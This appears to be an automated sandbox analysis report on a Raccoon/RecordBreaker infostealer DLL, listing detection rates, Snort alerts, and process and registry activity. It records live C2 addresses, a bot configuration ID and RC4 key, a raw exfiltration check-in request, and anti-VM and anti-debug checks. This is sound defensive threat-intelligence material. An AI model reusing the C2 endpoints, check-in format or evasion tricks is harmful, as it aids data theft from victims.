Click to jump to signature section
Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll | ReversingLabs: Detection: 43% |
Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll | Virustotal: Detection: 71% | Perma Link |
Source: 4.2.rundll32.exe.10000000.0.unpack | Malware Configuration Extractor: Raccoon {"C2 url": ["http://85.192.63.204/", "http://185.229.65.197/"], "Bot ID": "e501fdc78ff3edbb9f720e1766e14ded", "RC4_key1": "e501fdc78ff3edbb9f720e1766e14ded"} |
Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL |
Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT |
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 185.229.65.197 80 | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 85.192.63.204 80 | Jump to behavior |
Source: Traffic | Snort IDS: 2043003 ET TROJAN Win32/RecordBreaker - Observed UA M5 (23591) 192.168.2.7:49716 -> 185.229.65.197:80 |
Source: Traffic | Snort IDS: 2036934 ET TROJAN Win32/RecordBreaker CnC Checkin M1 192.168.2.7:49716 -> 185.229.65.197:80 |
Source: Traffic | Snort IDS: 2043003 ET TROJAN Win32/RecordBreaker - Observed UA M5 (23591) 192.168.2.7:49717 -> 185.229.65.197:80 |
Source: Traffic | Snort IDS: 2036934 ET TROJAN Win32/RecordBreaker CnC Checkin M1 192.168.2.7:49717 -> 185.229.65.197:80 |
Source: Traffic | Snort IDS: 2043003 ET TROJAN Win32/RecordBreaker - Observed UA M5 (23591) 192.168.2.7:49721 -> 185.229.65.197:80 |
Source: Traffic | Snort IDS: 2036934 ET TROJAN Win32/RecordBreaker CnC Checkin M1 192.168.2.7:49721 -> 185.229.65.197:80 |
Source: Malware configuration extractor | URLs: http://85.192.63.204/ |
Source: Malware configuration extractor | URLs: http://185.229.65.197/ |
Source: Joe Sandbox View | ASN Name: LINK-ASRU LINK-ASRU |
Source: unknown | TCP traffic detected without corresponding DNS query: 85.192.63.204 |
Source: unknown | TCP traffic detected without corresponding DNS query: 85.192.63.204 |
Source: unknown | TCP traffic detected without corresponding DNS query: 85.192.63.204 |
Source: unknown | TCP traffic detected without corresponding DNS query: 85.192.63.204 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.229.65.197 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.229.65.197 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.229.65.197 |
Source: unknown | TCP traffic detected without corresponding DNS query: 85.192.63.204 |
Source: unknown | TCP traffic detected without corresponding DNS query: 85.192.63.204 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.229.65.197 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.229.65.197 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.229.65.197 |
Source: unknown | TCP traffic detected without corresponding DNS query: 85.192.63.204 |
Source: unknown | TCP traffic detected without corresponding DNS query: 85.192.63.204 |
Source: unknown | TCP traffic detected without corresponding DNS query: 85.192.63.204 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.229.65.197 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.229.65.197 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.229.65.197 |
Source: rundll32.exe, 00000003.00000002.279841751.000000000324A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.272568992.00000000032A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.280873956.00000000032A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.272568992.000000000327D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.279841751.000000000327D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.229.65.197/ |
Source: rundll32.exe, 00000003.00000003.272568992.000000000327D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.279841751.000000000327D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.229.65.197/5563209-4053062332-1002 |
Source: rundll32.exe, 00000003.00000003.272568992.00000000032A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.280873956.00000000032A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.229.65.197/9 |
Source: rundll32.exe, 00000003.00000003.272568992.00000000032A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.280873956.00000000032A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.229.65.197/=D |
Source: rundll32.exe, 00000003.00000003.272568992.00000000032A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.280873956.00000000032A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.229.65.197/c |
Source: rundll32.exe, 00000003.00000003.272568992.000000000327D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.279841751.000000000327D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.229.65.197/ounterMutexv |
Source: rundll32.exe, 00000003.00000003.265737014.00000000032A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.279841751.000000000324A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.272568992.00000000032A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.280873956.00000000032A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.272568992.000000000327D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.279841751.000000000327D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://85.192.63.204/ |
Source: rundll32.exe, 00000003.00000003.265737014.00000000032A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://85.192.63.204/% |
Source: rundll32.exe, 00000003.00000002.279841751.000000000324A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://85.192.63.204/2 |
Source: rundll32.exe, 00000003.00000003.265737014.000000000327D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://85.192.63.204/53321935-2125563209-4053062332-1002 |
Source: rundll32.exe, 00000003.00000002.279841751.000000000324A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://85.192.63.204/b |
Source: rundll32.exe, 00000003.00000003.265737014.00000000032A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://85.192.63.204/c |
Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll | String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t |
Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll | String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# |
Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll | String found in binary or memory: http://ocsp.sectigo.com0 |
Source: rundll32.exe, 00000003.00000003.272568992.000000000327D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.279841751.000000000327D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fs.microsoft.c |
Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll | String found in binary or memory: https://sectigo.com/CPS0 |
Source: unknown | HTTP traffic detected: POST / HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: 23591Host: 185.229.65.197Content-Length: 98Connection: Keep-AliveCache-Control: no-cacheData Raw: 6d 61 63 68 69 6e 65 49 64 3d 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 7c 66 72 6f 6e 74 64 65 73 6b 26 63 6f 6e 66 69 67 49 64 3d 65 35 30 31 66 64 63 37 38 66 66 33 65 64 62 62 39 66 37 32 30 65 31 37 36 36 65 31 34 64 65 64 Data Ascii: machineId=d06ed635-68f6-4e9a-955c-4899f5f57b9a|user&configId=e501fdc78ff3edbb9f720e1766e14ded |
Source: loaddll32.exe, 00000000.00000002.266057331.00000000014EB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/> | |
Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL |
Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll | Binary or memory string: OriginalFilenameScanner.dll@ vs B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll |
Source: C:\Windows\System32\loaddll32.exe | Section loaded: vboxhook.dll | Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe | Section loaded: vboxogl.dll | Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_02EF22EE | 0_2_02EF22EE |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_02EEE4FE | 0_2_02EEE4FE |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_02EEACC7 | 0_2_02EEACC7 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_02EF1CA8 | 0_2_02EF1CA8 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_02EEBA8E | 0_2_02EEBA8E |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_02E91040 | 0_2_02E91040 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_02E80231 | 0_2_02E80231 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_02EECDE3 | 0_2_02EECDE3 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_02EED7F4 | 0_2_02EED7F4 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_02E81DD7 | 0_2_02E81DD7 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_02EBABA4 | 0_2_02EBABA4 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_02EEB383 | 0_2_02EEB383 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_02EF2794 | 0_2_02EF2794 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_02EEEF64 | 0_2_02EEEF64 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_02EEDF62 | 0_2_02EEDF62 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_02EF1117 | 0_2_02EF1117 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_02EF0711 | 0_2_02EF0711 |
Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll | Static PE information: invalid certificate |
Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll | ReversingLabs: Detection: 43% |
Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll | Virustotal: Detection: 71% |
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers | Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll,_Start@16 |
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll" | |
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll",#1 | |
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll,_Start@16 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll",#1 | |
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll",_Start@16 | |
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll",#1 | Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll,_Start@16 | Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll",_Start@16 | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll",#1 | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\VMwareGuestDnDDataMutex |
Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\VMToolsHookQueueLock |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1308:120:WilError_01 |
Source: classification engine | Classification label: mal76.troj.evad.winDLL@10/0@0/3 |
Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll | Static file information: File size 2103000 > 1048576 |
Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll | Static PE information: Raw size of DSEG is bigger than: 0x100000 < 0x119a00 |
Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_3_013902DF push edi; ret | 0_3_013902E0 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_3_013902DF push edi; ret | 0_3_013902E0 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_3_013902DF push edi; ret | 0_3_013902E0 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_3_013902DF push edi; ret | 0_3_013902E0 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_02E80481 push ebx; retf | 0_2_02E80482 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_02E82243 push ecx; ret | 0_2_02E82244 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_02E80231 push esi; retf | 0_2_02E803D3 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_3_03170376 push cs; iretd | 3_3_03170377 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_3_03170376 push cs; iretd | 3_3_03170377 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_3_03170376 push cs; iretd | 3_3_03170377 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_3_03170376 push cs; iretd | 3_3_03170377 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_3_03170376 push cs; iretd | 3_3_03170377 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_3_03170376 push cs; iretd | 3_3_03170377 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_3_03170376 push cs; iretd | 3_3_03170377 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_3_03170376 push cs; iretd | 3_3_03170377 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_3_03170376 push cs; iretd | 3_3_03170377 |
Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll | Static PE information: section name: DSEG |
Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll | Static PE information: section name: DSEG |
Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll | Static PE information: section name: DSEG |
Source: initial sample | Static PE information: section where entry point is pointing to: DSEG |
Source: initial sample | Static PE information: section name: DSEG entropy: 7.980689708362385 |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe TID: 4220 | Thread sleep count: 43 > 30 | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe TID: 4220 | Thread sleep count: 56 > 30 | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5312 | Thread sleep count: 56 > 30 | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3340 | Thread sleep count: 42 > 30 | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3340 | Thread sleep count: 57 > 30 | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | File opened / queried: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\VBoxHook.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | File opened / queried: C:\Windows\SysWOW64\Wbem\VBoxHook.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | File opened / queried: C:\Windows\system\VBoxHook.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | File opened / queried: C:\Windows\VBoxHook.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | File opened / queried: C:\Users\user\AppData\Local\Microsoft\WindowsApps\VBoxHook.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | File opened / queried: C:\Windows\SysWOW64\OpenSSH\VBoxHook.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | File opened / queried: C:\Users\user\Desktop\VBoxHook.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\VBoxHook.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | File opened / queried: C:\Windows\SysWOW64\VBoxHook.dll | Jump to behavior |
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed |
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected |
Source: C:\Windows\System32\loaddll32.exe | Thread delayed: delay time: 120000 | Jump to behavior |
Source: loaddll32.exe, 00000000.00000002.266057331.00000000014EB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VBoxHook.dllfro |
Source: rundll32.exe, 00000005.00000002.301210972.0000000004CB0000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: VMwareGuestDnDDataMutex |
Source: rundll32.exe, 00000005.00000002.301210972.0000000004CB0000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: KERNEL32.dllUSER32.dllGDI32.dllole32.dllOLE32.dllPELockKERNEL32.dllUSER32.dllADVAPI32.dllCOMCTL32.dllSHELL32.dllUXTHEME.dllVMwareDnDManagerEventVMwareGuestDnDDataMutexLocal\VMToolsHookQueueLockVBoxHook.dllVBoxOGL.dllCannot load "%s" library (missing file). |
Source: loaddll32.exe, 00000000.00000002.266057331.00000000014EB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\Windows\VBoxHook.dlll |
Source: rundll32.exe, 00000005.00000002.301210972.0000000004CB0000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: Local\VMToolsHookQueueLock |
Source: rundll32.exe, 00000003.00000002.280873956.00000000032AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.274090013.00000000032AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.272568992.00000000032AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.265737014.000000000327D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.265737014.00000000032AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.272568992.000000000327D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.279841751.000000000327D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW |
Source: loaddll32.exe, loaddll32.exe, 00000000.00000002.266155920.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.281263648.0000000004AE0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.279586812.0000000004010000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.301210972.0000000004CB0000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: VBoxHook.dll |
Source: loaddll32.exe, 00000000.00000002.266057331.00000000014EB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareDnDManagerEvente |
Source: rundll32.exe, 00000005.00000002.301210972.0000000004CB0000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: VMwareDnDManagerEvent |
Source: loaddll32.exe, 00000000.00000002.266057331.00000000014EB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\Windows\system\VBoxHook.dll{] |
Source: C:\Windows\System32\loaddll32.exe | Process queried: DebugPort | Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe | Process queried: DebugPort | Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe | Process queried: DebugPort | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: SIWDEBUG |
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: SIWVIDSTART |
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: NTICE |
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: SICE |
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: SIWVID |
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected |
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 185.229.65.197 80 | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 85.192.63.204 80 | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll",#1 | Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_02E91170 cpuid | 0_2_02E91170 |
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid | Jump to behavior |
Source: Yara match | File source: dump.pcap, type: PCAP |
Source: Yara match | File source: 00000003.00000003.274090013.00000000032AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.271382455.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000005.00000003.300509455.0000000003420000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.272568992.00000000032AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000005.00000003.300634384.0000000003420000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.271031641.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000002.278732555.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5036, type: MEMORYSTR |
Source: Yara match | File source: dump.pcap, type: PCAP |
Source: Yara match | File source: 00000003.00000003.274090013.00000000032AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.271382455.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000005.00000003.300509455.0000000003420000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.272568992.00000000032AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000005.00000003.300634384.0000000003420000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.271031641.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000002.278732555.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5036, type: MEMORYSTR |